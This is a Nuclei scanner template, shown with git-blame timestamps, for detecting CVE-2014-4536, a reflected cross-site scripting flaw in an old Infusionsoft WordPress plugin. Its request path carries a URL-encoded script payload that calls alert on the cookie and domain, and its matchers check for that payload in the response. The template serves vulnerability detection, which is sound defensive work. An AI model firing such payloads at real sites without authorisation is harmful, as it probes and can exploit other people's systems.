my-nuclei-templates/CVE-2014-4536.yaml

42 lines
1.6 KiB
YAML
Raw Normal View History

2021-08-05 22:54:02 +00:00
id: CVE-2014-4536
info:
2022-06-18 08:05:25 +00:00
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
2021-08-05 22:54:02 +00:00
author: daffainfo
severity: medium
2022-06-18 08:05:25 +00:00
description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
2021-09-02 08:03:02 +00:00
reference:
2021-08-05 22:54:02 +00:00
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
2022-06-18 08:05:25 +00:00
- http://wordpress.org/plugins/infusionsoft/changelog
- http://codevigilant.com/disclosure/wp-plugin-infusionsoft-a3-cross-site-scripting-xss
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-09-17 06:03:58 +00:00
cve-id: CVE-2014-4536
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2014,wordpress,wp-plugin,xss
2021-08-05 22:54:02 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
2022-06-18 08:05:25 +00:00
# Enhanced by mp on 2022/02/24